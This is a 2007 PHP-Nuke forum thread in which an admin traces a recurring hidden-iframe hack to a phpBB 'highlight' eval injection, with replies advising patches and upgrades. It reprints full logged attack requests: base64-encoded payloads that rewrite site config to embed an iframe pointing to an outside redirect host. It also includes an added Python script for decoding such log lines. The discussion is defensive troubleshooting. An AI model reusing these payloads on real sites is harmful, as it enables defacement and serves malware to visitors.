Ravens PHP Scripts: Forums
 

 

Rumbaar
Regular

Joined: Apr 16, 2004
Posts: 78
Location: Melbourne, Australia

Posted: Tue Sep 18, 2007 6:08 pm

I'm running a few php-nuke sites, two of my older versions heavily bastardized with various protection codes and updates, one is core 6.6 and the other later maybe 7.1 .. not sure. The first one can't be updated due to various legacy data.

Now in recent weeks I have encountered 'hacks' into the config table of phpnuke with the addition of a 'hidden' iframe with a link/redirector to an alternate site. With a fully secure system it does nothing and running FF helps, I just go in and change back the data. But that's not ideal.

No other changes are being made to the config table or site. Any thoughts on how this is possible? Or suggestions?

Thx in advance,

_________________
Victim's aren't we all! 
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6437

Posted: Tue Sep 18, 2007 8:23 pm

Have you checked your site access logs? That's usually the best place to start. You should be able to use NukeSentinel, even on older sites. Most cross site scripting can be stopped by using admin authentication - NukeSentinel has tools for that, but you can also find how to set it up by searching the forums here. You can usually see SQL injection (another common way to deface / gain inappropriate access to a site) in the site log. NukeSentinel will stop that, but not if the site has addons that bypass normal Nuke database access functions (some addons do that, and some galleries allow bad files to be uploaded if you're not careful). Hopefully that helps...

_________________
I search, therefore I exist...
Rumbaar







Posted: Tue Sep 18, 2007 10:40 pm

I'll be sure to look at the access logs tonight. Hopefully something striking will present itself in the mass of logs.

I don't have many, if any, additional addons to the core php-nuke of that period.
 
Rumbaar







Posted: Tue Sep 18, 2007 11:56 pm

Well, I reviewed the logs and the only things out of the 'normal' attacks are the following. They appear to be coded, and I'm not sure of the correct process to decode them so I can read what they are doing. Any thoughts?
Code:
 81.29.242.2 - /modules.php?name=Forums&file=viewtopic&t=5597&w=JGc9dXJsZGVjb2RlKGJhc2U2NF9kZWNvZGUoJF9HRVRbcTFdKSk7ICRkYi0%2Bc3FsX3F1ZXJ5KCJVUERBVEUgbnVrZV9jb25maWcgU0VUIGZvb3QxPSRnIik7&q1=JzxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnLyB0YXJnZXQ9Ymxhbms%2BPGltZyBoc3BhY2U9MTAgc3JjPWltYWdlcy9wb3dlcmVkL3Bvd2VyZWQ1LmpwZyBib3JkZXI9MD48L2E%2BPGJyPjxpZnJhbWUgc3JjPWh0dHA6Ly9wb3Jub3BlcnZvaS5jb20vaS5waHAgd2lkdGg9MSBoZWlnaHQ9MT48L2lmcmFtZT48IS0taTItLT4n&highlight=%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527


and followed by this 35 min later

Code:
81.29.242.2 - /modules.php?name=Forums&file=viewtopic&t=5597&w=JGc9dXJsZGVjb2RlKGJhc2U2NF9kZWNvZGUoJF9HRVRbcTFdKSk7ICRkYi0%2Bc3FsX3F1ZXJ5KCJVUERBVEUgbnVrZV9jb25maWcgU0VUIGNvcHlyaWdodD0kZyIpOw%3D%3D&q1=JzxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnPjxmb250IGNsYXNzPWZvb3Rtc2dfbD5QSFAtTnVrZTwvZm9udD48L2E%2BIENvcHlyaWdodCAmY29weTsgMjAwNSBieSBGcmFuY2lzY28gQnVyemkuIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSBhbmQgeW91IG1heSByZWRpc3RyaWJ1dGUgaXQgdW5kZXIgdGhlIDxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnL2ZpbGVzL2dwbC50eHQ%2BPGZvbnQgY2xhc3M9Zm9vdG1zZ19sPkdQTDwvZm9udD48L2E%2BLiBQSFAtTnVrZSBjb21lcyB3aXRoIGFic29sdXRlbHkgbm8gd2FycmFudHkgZm9yIGRldGFpbHMgc2VlIHRoZSA8YSBocmVmPWh0dHA6Ly9waHBudWtlLm9yZy9maWxlcy9ncGwudHh0Pjxmb250IGNsYXNzPWZvb3Rtc2dfbD5saWNlbnNlPC9mb250PjwvYT4uPGlmcmFtZSBzcmM9aHR0cDovL3Bvcm5vcGVydm9pLmNvbS9pLnBocCB3aWR0aD0xIGhlaWdodD0xPjwvaWZyYW1lPjwhLS1pMi0tPic%3D&highlight=%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527


Sorry about the large single line. I can see URLdecode in there. Though they did return a 403 on the server.

-Rumbaar
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

Posted: Wed Sep 19, 2007 1:58 am

Mm your log must be truncated. As you said, they are coded.

The injection itself is the highlight variable. That's a known issue with phpBB and has been secured. It should not affect BBToNuke 2.0.22

The injection itself does a simple
eval urldecode base64_decode of the $_GET['w'] variable

Decoding that, it does another urldecode, base64_decode of the $_GET[q1] variable
Where that is, I have no idea.. I think your log doesn't display it all.
Finally it uses that decoded output to add code to your nuke_config table in the copyright field

That could be something simple like Javascript to grab your admin cookies and wreak havoc on your site.

Rumbaar







Posted: Wed Sep 19, 2007 4:26 pm

Thx evaders,

Ok, I'm certainly not running BBtoNuke 2.0.22 :(

Is there a 'simple' method to apply a patch or modification to my old, old version of phpBBnuke?
 
Gremmie
Former Moderator in Good Standing



Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

Posted: Wed Sep 19, 2007 5:24 pm

Evaders, I'm curious about this exploit. Does that mean there was code in an older version of PHPBB that expected a w variable in $_GET, and the code would do an eval urldecode base64_decode of that variable???

Susann
Moderator



Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

Posted: Wed Sep 19, 2007 5:37 pm

Rumbaar, did you already search on Google for your site? Sites with dangerous iframes are specially marked there. However, there are different kinds of iframe attacks and some iframes are more or less harmless, but I would just not run such an old nuke version because there isn't a module within which is secure and patch 2.9 for these versions is some years old.
You could update only your forum; that works, I did that in the past with my old nuke version. But if I were you I would upgrade to RavenNuke. I did that with 6.5 in place and everything works.
 
evaders99







Posted: Wed Sep 19, 2007 6:02 pm

The exploit is in the "highlight" variable. It is the trigger that allows all the other nasty code to work. The $_GET variables used there are just extra payload, trying to obfuscate the exploit from your logs. You don't even notice the highlight= part unless you scroll to the end of that log.

You need to get yourself secured. Get the latest Patched files for your version at http://www.nukeresources.com
And then upgrade your forums to the latest 2.0.22. The BBToNuke packages (from the same site) are what you want. No, they are not cumulative - you will have to install each sequentially.

That's going to be a lot of work. You can either
a) start with fresh Patched files and re-do your customizations
or
b) try to make the Patched changes directly to your current system.

It really depends on how many code changes you'd have to do, and whether you're familiar enough with the code to do it. I prefer solution A myself. Easier to redo customizations that you've already done.
Either way, get a good file difference program - I use WinMerge, it's free!
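
The decoding chain evaders99 describes in the two replies above, as an added log-triage example (not code from this thread, phpBB or PHP-Nuke): it undoes the double URL encoding on highlight and base64-decodes any other parameter that hides text. The function names are assumptions, and the sample request reuses the highlight value from the logged requests with a constructed, harmless w value.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote, urlsplit

# PHP constructs that have no business in a search-highlight value.
CODE_MARKERS = re.compile(r"eval\s*\(|base64_decode\s*\(|\$_(GET|POST|REQUEST|COOKIE)\b", re.I)
B64_SHAPE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def fully_unquote(value, max_rounds=5):
    """URL-decode repeatedly so double encoding such as %2527 collapses to a quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def try_base64(value):
    """Return the decoded text if value is base64 holding printable text, else None."""
    if not B64_SHAPE.fullmatch(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # The injected code runs urldecode() on the decoded text, so mirror that step.
    return unquote(text) if text.isprintable() else None

def triage(request_path):
    """Decode one logged request path and flag code passed through highlight."""
    query = urlsplit(request_path).query
    # Split by hand: parse_qs would turn a literal '+' inside base64 into a space.
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    highlight = fully_unquote(params.get("highlight", ""))
    hidden = {k: d for k, v in params.items() if (d := try_base64(unquote(v))) is not None}
    return {"highlight": highlight,
            "code_in_highlight": bool(CODE_MARKERS.search(highlight)),
            "hidden_payloads": hidden}

# Constructed sample: the highlight value is copied from the log lines in this thread;
# w carries a harmless constructed string instead of the logged payload.
SAMPLE_W = quote(base64.b64encode(b"/* constructed stand-in payload */").decode(), safe="")
SAMPLE = ("/modules.php?name=Forums&file=viewtopic&t=5597&w=" + SAMPLE_W + "&highlight="
          "%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527")

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Feeding each request path from an access log through triage() surfaces the highlight trigger and the readable form of the w and q1 values without scrolling to the end of the line.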
 
Rumbaar







Posted: Wed Sep 19, 2007 7:56 pm

I'm pretty quick in discovering the iframes Susann, so they don't last long enough for the Google spiders to catch and/or flag.

I'll look to nukeresources and see if I can patch it manually, it sounds like a long list of work.

I've tried to do A) evaders in the past, but with later character restrictions various 'allowable' username characters (mine and others) don't seem to be compatible with the 7.6 secure nuke. One of my newer sites uses 7.6 ravennuke, but previous two from older days don't. They are around from '03 and I wouldn't even begin to remember all the changes I've done since then.

With this 'payload', is the only place they can insert code the config table, or is that just the ideal place? I mean, can they inject into any table in the database?
 
evaders99







Posted: Thu Sep 20, 2007 4:06 pm

They can inject any SQL, download and run other code. Thus the wide number of attacks against phpBB systems.
 
Rumbaar







Posted: Thu Sep 20, 2007 5:55 pm

I've found the core php-nuke patches on that site, but can't seem to find the specific BBtoNuke patches though.
 
evaders99







Posted: Thu Sep 20, 2007 11:40 pm

Search the Downloads with the specific BBToNuke version numbers.

If you confirm what phpNuke version you are using, and you've not done any upgrades before, this list contains what BBToNuke version the stock phpNuke came with. (Sorry this list hasn't been updated in a while)

http://evaders.swrebellion.com/modules.php?name=Index&readme=1#history
Look under the phpNuke column. The (2.0.xx) number is what you'd have currently.

So phpNuke 6.6 came with 2.0.2. I don't even know if there's a version standalone of 2.0.3. You're almost better off upgrading to at least phpNuke 7.6 with stock 2.0.10. Then going for BBToNuke 2.0.12 - 2.0.22
 
All times are GMT - 6 Hours
 